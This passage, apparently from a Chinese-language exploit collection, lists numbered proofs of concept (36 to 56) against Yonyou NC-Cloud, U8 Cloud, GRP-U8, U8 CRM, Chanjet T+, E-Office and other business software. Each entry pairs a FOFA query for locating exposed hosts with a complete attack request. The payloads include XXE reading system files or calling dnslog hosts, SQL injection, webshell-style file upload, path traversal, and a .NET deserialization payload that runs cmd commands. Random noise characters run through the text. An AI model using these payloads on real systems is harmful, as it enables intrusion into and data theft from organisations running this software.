9 Z7 R+ ?4 p# i( J+ j0 PPOST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1) m: W7 L- t1 M; N$ ~
Host: 203.25.218.166:88885 \& H$ H1 i/ B
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info# P" d* \9 C* V/ w
Accept-Encoding: gzip, deflate
0 @! f! J; l$ |Accept: */*3 R/ D1 j$ ?4 d9 ?$ l
Connection: close
4 i( }2 F. m/ H9 laccessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
+ u9 K& f) G, ~' M7 e1 PContent-Length: 190
6 u( L7 q5 p# E- C4 h- X0 DContent-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0
* F" B4 a% U, i" n) w' D+ ?/ A( k( V$ k( n% K) H4 P
--fd28cb44e829ed1c197ec3bc71748df07 n( @$ L* { e, \& y
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"6 v* J" D8 z) \5 d! W
- y1 l# `7 E0 ^" |1 @
<%out.println(1111*1111);%>
8 G+ r7 V l6 \5 k S" m e! x--fd28cb44e829ed1c197ec3bc71748df0--
+ G$ \* D7 {% W- R, a) g- m0 _' m9 E- K7 E; Y1 z
6 T5 f9 N6 L( K0 P3 E1 {5 Y* a36. 用友NC-Cloud soapFormat XXE
- F: a% F4 l) Z% EFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"/ P0 j5 k- d2 P) ?! }
POST /uapws/soapFormat.ajax HTTP/1.1
+ F* s7 P% h8 Q! x- x" xHost: 192.168.40.130:89897 B3 A$ {$ x" u0 F
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0% k% P R/ x( e8 r4 p+ d0 S
Content-Length: 263
9 ^" V3 F4 m+ {$ Q) B6 [Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8: d: F C" p R
Accept-Encoding: gzip, deflate
8 S6 L% y; T- d X3 tAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
& q( \% D+ n: ? A9 R9 mConnection: close
/ j: k+ J: S* KContent-Type: application/x-www-form-urlencoded
. i# K( ~% n. G; i: NUpgrade-Insecure-Requests: 12 H+ r* a4 N+ E4 e D
0 y* p G- c& q; B0 r1 b
msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a% [) v% z# `5 @; R ?+ z
0 i7 r N. ]& x' i5 y
4 l0 S* {6 e0 Q37. 用友NC-Cloud IUpdateService XXE. w7 P- H6 v0 X0 T6 E6 \4 P8 M1 ^$ P* ?
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
$ {9 U% a! [. R. K1 t8 U" HPOST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
4 r7 |, |+ H% ?3 b( Z* ?Host: 192.168.40.130:8989
8 l' r$ r/ [, P/ Q- AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
, Z- X- G l5 t6 _) RContent-Length: 421
1 n: U% Y2 D1 j' _: }Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
- H7 U. i, V* R) B+ W4 v- Y2 rAccept-Encoding: gzip, deflate+ {5 n7 l% I+ t L: L, Q/ v$ h
Accept-Language: zh-CN,zh;q=0.9
* E! G8 E4 E! b- O2 a3 z, zConnection: close1 Y5 f1 u, L @: b7 A# A
Content-Type: text/xml;charset=UTF-8
6 I7 g' g! Q, `7 b1 r0 }SOAPAction: urn:getResult
" U* G2 a# P5 C( S- `6 jUpgrade-Insecure-Requests: 12 R* u" T; ?% g
D/ y; V n/ c2 i4 o& i
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
5 L8 X( v# L9 ^ F/ {<soapenv:Header/>/ G3 K% q/ m) }: \
<soapenv:Body>3 {5 X& l$ ?% s# H( L( T; }3 D9 H
<iup:getResult>
1 w2 ]& D; b0 n) n, O$ W5 R! e<!--type: string-->3 r3 _4 r# k: ]
<iup:string><![CDATA[
( T$ }2 I: K) Q9 p) ?<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
/ H. A, c' u" ~- r2 b<xxx/>]]></iup:string>
! k" D {4 S+ V$ t" Z: i</iup:getResult>
& H# y- g2 Q" H0 ~$ D0 y6 A</soapenv:Body>2 ~4 K( M1 C# e# B3 \- f# M' z7 q
</soapenv:Envelope># q- T7 q$ o2 I- Q
6 N5 O; X, N2 p% K0 w+ u
4 c4 g; t: T, L$ g# m S" a8 `0 i- d" f
38. 用友U8 Cloud smartweb2.RPC.d XXE
, O% g9 Y/ V0 P+ F% K4 vFOFA:app="用友-U8-Cloud"' b- I0 P, A1 B
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.18 \, W+ Z0 x! l/ r0 u
Host: 192.168.40.131:8088
: R! |% L+ N4 ^9 H3 y; d9 uUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
4 o. V% z* `0 c, I" Q) }( j1 uContent-Length: 260
0 f. l1 M0 z) P- BAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b39 _* h* i9 g0 F( x' B: }/ ~& C
Accept-Encoding: gzip, deflate
5 o2 X4 F7 o: }Accept-Language: zh-CN,zh;q=0.9
5 X( z. B$ P+ x7 y l* Z( uConnection: close+ Z0 c. ^! ^, v9 \* \
Content-Type: application/x-www-form-urlencoded) G6 F+ k1 v2 I) x6 W3 p3 a
& _, f" I* s( I: \. k) d' w4 H
__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>8 g7 z6 ~6 P1 T$ w/ Z
! ^" l7 q$ R; b$ w8 ^8 c6 m
e& W% `/ ?2 }/ Z9 A6 H; c
39. 用友U8 Cloud RegisterServlet SQL注入
8 o5 ?6 x: [; v6 A) D/ p2 TFOFA:title="u8c"
# K B- B# |) ]$ N2 Y6 B9 tPOST /servlet/RegisterServlet HTTP/1.15 S9 A2 I7 y6 n, ^$ Y$ H) L
Host: 192.168.86.128:8089
) Z$ D: K6 r4 Q1 S+ `2 yUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
& Y# s6 U& z' U- | `4 d8 |Connection: close
% p) c. q' `+ P' u& ?Content-Length: 85
: ?/ `- r% J% G; N8 KAccept: */*
9 f, L6 Z( V9 ~- Y% M7 bAccept-Language: en
, u3 M. G# T4 g* K" U# CContent-Type: application/x-www-form-urlencoded
% c A( ^! M/ m% m' V4 dX-Forwarded-For: 127.0.0.1, b" }) C& b% y$ z9 A' Z
Accept-Encoding: gzip
3 s" m' e. ?. }5 a" ^4 i7 p% a* ~# q" Z/ e/ C% b
usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--. |1 {+ b$ |! ?: k
' Y9 I0 }$ c6 D* T( z9 Q
6 `5 T/ M/ O1 W9 P
40. 用友U8-Cloud XChangeServlet XXE
' R& G* H4 r1 p4 t8 T# NFOFA:app="用友-U8-Cloud"
u/ T# @# g+ a# h( K6 z1 O( k" nPOST /service/XChangeServlet HTTP/1.1
2 N5 @0 O$ a W" q \ PHost: x.x.x.x
6 |! J; F) L3 C, K$ Z5 l8 O! |User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
+ C4 d. _* X# b+ UContent-Type: text/xml( r( x/ T: {: |7 T: p
Connection: close
+ t- F7 L( ]. @2 q5 G
( p: w5 j9 z" y o7 G$ P<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>
+ Q( F2 [8 \8 j, i7 T+ d! w) y' Z$ _$ H. G4 k. }$ J. p
! O2 P8 `6 o Y# _5 |. z1 r
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
9 y9 H6 j$ J9 v5 C& `FOFA:app="用友-U8-Cloud"
0 R5 u, Q7 X/ M* }, L( o4 W7 TGET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
8 S: g! B& B" F& r- ~. uHost:
3 |5 }) V% D. u; lUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.159 B, {; ^- o+ l j) T
Content-Type: application/json
- U( U/ n l' X( L2 ~) P) aAccept-Encoding: gzip$ \& `) Y( t' P; b5 c3 [' b
Connection: close( F4 p& d5 Z) ^4 M W6 r
2 Y9 X( x: W" N, `3 ]. G. d U8 S% U/ o; i8 r. b! t/ C
42. 用友GRP-U8 SmartUpload01 文件上传0 s2 l' e6 [9 G/ F7 k7 S. _: ~
FOFA:app="用友-GRP-U8"8 x3 U) B0 S+ P4 _6 J
POST /u8qx/SmartUpload01.jsp HTTP/1.1
! |# A. e( w! e4 p1 f) LHost: x.x.x.x: t' |+ }0 I3 k0 V
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
( h( K: a8 t( m0 R2 E+ b& OUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.369 s6 c: }& Q* C9 l: V
5 t% [4 ^# u# x1 s, k
PAYLOAD4 m, m2 w- G3 B, C7 J$ R9 C, V
. |8 k) X* g+ k" L
J, a- Q% ]/ ?; t, Thttp://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml
; u+ e9 s: R; L- ?1 N: v" V2 [3 W, ^6 s+ S2 _' n) P
43. 用友GRP-U8 userInfoWeb SQL注入致RCE% J1 t# n3 @: z: O
FOFA:app="用友-GRP-U8"/ ^* a' X' q4 i" u) _
POST /services/userInfoWeb HTTP/1.1$ A w$ C# ?# h: {4 o6 H% g! I
Host: your-ip
0 [. a% u# @4 x1 e3 m4 D0 aUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
8 G5 ? }' n, S K2 qAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7$ u8 L$ J6 T# k9 `" d3 n% k! i
Accept-Encoding: gzip, deflate L& @" W" s4 P( A- d) E
Accept-Language: zh-CN,zh;q=0.90 @0 i4 I3 j2 k( C! D
Connection: close# ^3 J/ o3 U" o( b$ ~7 Q/ q& G4 B/ f
SOAPAction:6 S* [5 X* u3 q/ p' N! q
Content-Type: text/xml;charset=UTF-8. ?( e3 P( r% k9 R( b) h
8 D9 i7 F' |4 m- ]1 Y" [! e2 D
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
' |3 l6 I6 i+ M* C0 S <soapenv:Header/>
% D* B6 w& H7 e) G0 C( m9 H q* U- F/ b <soapenv:Body>, \; a9 U' X, L/ d
<ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
; {# {. M! s# t: J+ {& U9 o <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
2 W+ ^- b$ I5 x4 W/ v9 G9 D </ser:getUserNameById>4 @ [8 ]1 g q( m+ ?
</soapenv:Body>
5 C. K# R# z$ Y3 [' D</soapenv:Envelope>
) ~8 o( @* W# F" I( N( H$ g" D R
w; E X/ a* V& H1 f- P4 B3 ~- U1 a: K& v
44. 用友GRP-U8 bx_dj_check.jsp SQL注入$ }6 I5 l: ?$ `2 o
FOFA:app="用友-GRP-U8"
2 D, ?3 q+ e( Q* D) J5 aGET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1, j; u6 N; M- b Y
Host: your-ip
9 S' w2 U) x* N( S) IUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
8 v' p8 Y1 Z+ @" _6 JAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
6 y+ s- ~" [6 T- g# YAccept-Encoding: gzip, deflate
5 ?. R: [6 {7 }' A4 Q mAccept-Language: zh-CN,zh;q=0.9
/ W0 @% K0 }- s w3 \ }- SConnection: close0 d6 z+ m1 H0 H" M3 a+ F3 r) T
( F5 @ g) M. K; a* [: x
/ D. ~% k; o0 d; T. f
45. 用友GRP-U8 ufgovbank XXE
) W H5 v5 |8 T* qFOFA:app="用友-GRP-U8", k- G7 t% }" x- Q
POST /ufgovbank HTTP/1.1, Z: G2 \7 ^7 ~
Host: 192.168.40.130:222
2 m _, P( c* E) L$ yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.01 c1 D; Z) L8 w, J* I. O
Connection: close
6 k. G( t( m! l4 L" D1 qContent-Length: 161& K3 A6 j" w+ C/ T1 M, a
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
1 ^3 w) B; ^3 F8 l2 a- L! q5 iAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
i) [: O* U9 H0 G3 i, |Content-Type: application/x-www-form-urlencoded9 I9 Z4 a3 E% X& k- g# V
Accept-Encoding: gzip
) i9 w$ k/ B: a/ X) H3 b: J5 Z, r
' F1 B+ y% T9 w/ Z6 RreqData=<?xml version="1.0"?>
$ h7 N6 k) e# e<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest
# E# g' N) q" q# K, U6 U, m# H5 k# G9 ?
9 v8 X4 ~( \/ y9 I. T) e. u
46. 用友GRP-U8 sqcxIndex.jsp SQL注入; I n$ r, \; m3 s4 ?
FOFA:app="用友-GRP-U8": C' u; j+ j3 n, V; e2 Z# c
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
" a0 s( d# J2 P2 g8 `Host: your-ip: i3 R' p- F. ^0 h) \+ J8 ]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
. ^4 S7 B' m8 M: JAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
: w, }5 W8 T+ s7 t; B% IAccept-Encoding: gzip, deflate
( Q9 Q& ~: ^5 ~# n- y7 f; X3 wAccept-Language: zh-CN,zh;q=0.9$ C9 f. t# F' C; f- `5 Y
Connection: close
2 b& [( f5 [. V% n% C. h
3 c+ S" C% l7 s7 e* Q: U
9 }. Z8 y! R, \! ^ i47. 用友GRP A++Cloud 政府财务云 任意文件读取
! }; p+ S c, f. JFOFA:body="/pf/portal/login/css/fonts/style.css"
1 `' s" _6 e/ f# Y. _- {+ h- `1 ?8 QGET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1) C& f/ l1 f+ }" ^' S1 S& H
Host: x.x.x.x) I5 O0 c& M4 |2 k7 v/ D$ b$ ?' |
Cache-Control: max-age=03 A. U, D k$ J2 h, W- @6 R+ `7 J7 H
Upgrade-Insecure-Requests: 1) @# j- n; I/ s5 X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36- _1 e' G! {8 P1 @2 G
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.77 \* D$ W% F# N" F) m v
Accept-Encoding: gzip, deflate, br! f5 f) o& ~& c+ B
Accept-Language: zh-CN,zh;q=0.9
7 R7 X. _& }/ z/ ^$ ?If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT6 Y7 P' @$ S( I: {' _. a1 ]
Connection: close
- I, Y# {4 `0 T( `# ~
* L- [7 ~8 O) X4 O# t3 \% p
( \6 ?: V' q& p, t) P
7 c1 a* [6 M+ E3 Q; |: n48. 用友U8 CRM swfupload 任意文件上传% [! y! P2 h9 E. g
FOFA:title="用友U8CRM"7 E7 e% v4 F7 \) `8 X- O& v
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.15 r6 S" h& r6 y# B, @
Host: your-ip! y2 @: m+ A0 n) L& j3 b8 X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
; I9 z/ m& k7 x' W; H2 rAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
; f$ W4 }: y* {7 L5 N- g5 d1 l! _Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2* N* T- ]( Y* t A
Accept-Encoding: gzip, deflate
4 T; p* y4 W" h/ q" e, @Content-Type: multipart/form-data;boundary=----2695209672394068716424300668558 x/ D+ h# f4 F
------2695209672394068716424300668559 ~: F( l8 }2 A; Q* i
Content-Disposition: form-data; name="file"; filename="s.php"% f$ Q( U2 G+ y8 e. h, }9 Q; {, S+ c6 @
12310 n! O8 w) q. k# _8 d$ T8 {
Content-Type: application/octet-stream
. S- B2 t6 l7 {1 a: @3 O) C------269520967239406871642430066855
3 e+ j4 ~' } u5 Q% v \Content-Disposition: form-data; name="upload"
; y! K- j& B; L6 R2 [+ r; I3 Nupload
" j4 S0 G- `1 F* Y# e------269520967239406871642430066855--: P# C8 I. E. z% \' h5 G( R; X
8 Z# |5 C! j7 \% \ [( y
. [! L* K0 z+ N( U
49. 用友U8 CRM系统uploadfile.php接口任意文件上传
1 m! r) t1 E/ m' iFOFA:body="用友U8CRM"
2 j8 B5 M& r+ W1 i
' B& b9 Y3 x6 DPOST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
. @: f- Y/ o5 p) s1 o5 sHost: x.x.x.x
" ~7 \0 c& g# W xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.01 s; f0 |3 x+ q+ U5 x
Content-Length: 3296 a' {! W' l% j8 j
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
/ {8 z6 G# d- k; s( j- zAccept-Encoding: gzip, deflate6 g0 r$ r8 ?# C- Z
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
) ^& Y$ X4 i7 K( K, }) }9 NConnection: close9 K# C1 d/ B" j2 c
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w
% u* T# n7 L; E* G3 b: s
2 U: |5 C e/ M6 c-----------------------------vvv3wdayqv3yppdxvn3w$ m k( g. G; H* C
Content-Disposition: form-data; name="file"; filename="%s.php "
& Q9 m4 @9 o, H1 tContent-Type: application/octet-stream
, V5 j. U" R; }8 {- {7 m( Y. e0 ~2 V$ P4 \
wersqqmlumloqa
+ l. s; O& T) k6 \-----------------------------vvv3wdayqv3yppdxvn3w* J* Y n- l% q$ W6 ?: [4 I# J$ M& I
Content-Disposition: form-data; name="upload"
q* K4 R$ p- _3 H7 r/ v" ~* m- {3 H% k+ L0 O2 G& V& a- @
upload
# b# L7 }# R4 ]2 Q-----------------------------vvv3wdayqv3yppdxvn3w--. q- a9 U' S) q6 |/ A
& j+ n, E, t6 A& y, J; {' o
3 u9 j* b- ]" r$ Y& u
http://x.x.x.x/tmpfile/updB3CB.tmp.php6 J: e2 }" l- p2 C
0 ~8 U! r5 O" R- C50. QDocs Smart School 6.4.1 filterRecords SQL注入
N9 T9 H, T9 |$ u" eFOFA:body="close closebtnmodal"
1 i4 {+ ?! L" @1 K# sPOST /course/filterRecords/ HTTP/1.1
0 v1 \) L; z. E c% y) ^: d$ z9 K \Host: x.x.x.x
# G' j( `' T' [/ U: _- EUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
/ Q! d; I" [3 g/ F# M8 H, T/ YConnection: close
$ x8 n. t, P+ K/ _Content-Length: 224/ I7 Y1 i! b' E- l9 F: `
Accept: */*! c) j9 x/ W% q$ n& ]1 R
Accept-Language: en
; X# j: M' D5 S! ?" q# T" u2 LContent-Type: application/x-www-form-urlencoded3 T# c4 e ]" B3 ^4 t5 n) Z
Accept-Encoding: gzip
8 l% Y1 S2 U, v% D. H+ S3 Z5 P6 `" }: u6 |
7 G* z$ Z' y$ b5 J7 n; B2 nsearchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1
( U! `; |% G6 X: o, R' z r- \3 o
" p' Y3 Q2 G, F; I6 O" |
$ f( C- F) b5 e9 l% R51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
# U9 c4 d2 P! Y' }9 dFOFA:app="云时空社会化商业ERP系统"
4 s: x6 _6 |3 K* B# UGET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
: H3 D, U9 X- QHost: your-ip4 F9 B1 R- D Q9 c6 {1 \
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
4 q) j' B7 x8 G' n* P0 u( r: JAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9( _# h7 d1 u* j) @: s5 G$ @
Accept-Encoding: gzip, deflate
+ N" N! x) [& M) Y7 |# P6 t" hAccept-Language: zh-CN,zh;q=0.9
" p1 H3 q6 ], MConnection: close+ n/ x& \: R7 r* }- ~; t6 v% h
2 t" n0 T( y/ @# Y- Z* ~ s6 a: ^+ d0 o% u
52. 泛微E-Office json_common.php sql注入1 b/ u* @. t" U/ N" F1 O$ u
FOFA:app="泛微-EOffice"
1 T. t. u( U* [3 c' W7 z0 Q0 qPOST /building/json_common.php HTTP/1.1
4 O/ l8 h5 Z5 ]2 S0 j9 eHost: 192.168.86.128:8097/ |; x7 a. k2 n2 p& R
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36. g' M" `+ f+ Q, D4 e
Connection: close& m5 H/ x! ?$ ~
Content-Length: 87, M' O* n% z- l. @$ M# c
Accept: */*2 w: \5 E" [5 r# h4 N F
Accept-Language: en5 E2 x, `- W2 x% D7 t+ H3 `
Content-Type: application/x-www-form-urlencoded
0 E; e H* Y8 S* S7 {7 U' ~Accept-Encoding: gzip
' q9 I/ M! `! y2 o4 A" Z+ w: V2 r5 p0 Z7 E: n# V3 `
tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333
, q" `% C, H+ c% m ?% T
" ]) c- M, Q1 `- j, ?( `% `6 \( ^; ^( D' V9 Q
53. 迪普 DPTech VPN Service 任意文件上传
' X5 R; g9 S) c* |3 r& iFOFA:app="DPtech-SSLVPN"
' _0 B' s5 `) n) O K/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
7 D2 ?$ G3 N, e& C- L7 W. m% [1 L. E; d0 x2 f# [
5 s g7 V/ m# u \+ _: l& H( a
54. 畅捷通T+ getstorewarehousebystore 远程代码执行- C# H# D" Y9 j1 D# A" H6 r
FOFA:app="畅捷通-TPlus"5 p' t3 w C% q* b+ N1 Z" N$ ?
第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件+ T8 z% o* V: z4 q. \1 n5 {
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"0 w7 M& l0 [& \, k% D8 Q
5 g9 n5 Y* y+ c; d$ G# Z
. m0 Y) C: W( m0 b# ]) }9 ^完整数据包* r% k5 g U! }4 p! _. F# _% A. Z
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.10 D# k6 Z0 _2 n6 _$ i0 Z
Host: x.x.x.x
4 e+ c) N" u+ lUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F* ^' b6 u u- R* [
Content-Length: 593$ W Z, L0 r5 d% i) F+ u6 |/ j' |$ u
& E( }+ V) H; _$ U/ M. S" w! K{
$ V( [ |' s- }4 o"storeID":{* n. j( K( y7 n9 H% _7 e! Z
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",( p- d9 s0 Q5 s* P0 [7 U
"MethodName":"Start",; S. f( @6 _2 } G2 u/ b( D
"ObjectInstance":{
' P) b5 \! k% d3 w8 N: B "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",3 H* m5 @+ x% g) U& h, N# g
"StartInfo":{
+ Z' w5 s, }. n "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
' U+ v$ @! Z9 I. A+ u/ j+ o "FileName":"cmd",% T* x5 [1 v1 v9 y, Z, I# v
"Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"- I: H* j( [ _, z0 t
}! c' ?. m$ y" G3 D6 X
}
0 w0 K3 t, g1 C$ O s" Q. Q }, @( p' _9 p' E3 v8 {; \( _$ g
}
! e E; n. x, C1 c; v/ D! \
0 b6 g* o" b: s3 p" h, `
% k5 v1 W1 g9 M. u4 r p* {3 k第二步,访问如下url
; n! @- x$ |4 \! w4 u/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt6 b2 R: |+ W8 v- z; O4 b2 h$ X$ \+ b
5 |3 r9 H W) K8 q+ _; s/ `
, e* @4 J3 `+ ]8 U u( D( d
55. 畅捷通T+ getdecallusers信息泄露& O: B( H k9 P
FOFA:app="畅捷通-TPlus"
2 U( W/ B" }2 v3 J! g4 X7 m第一步,通过
! j! o3 d, l0 H/ k- p. D/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie
" X2 m M! g- x! ^- x第二步,利用获取到的Cookie请求
" j1 F* t' o& Y' P/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers
" U# K, W7 _& a6 Y9 z) |
3 G% d1 a4 Z+ V6 \$ F+ _. ?( r6 K56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
6 P$ Y! M3 e+ U% E, S4 @* hFOFA: app="畅捷通-TPlus"
, l# T0 W7 m; ?9 @POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1$ C/ H$ q2 [6 k- D
Host: x.x.x.x
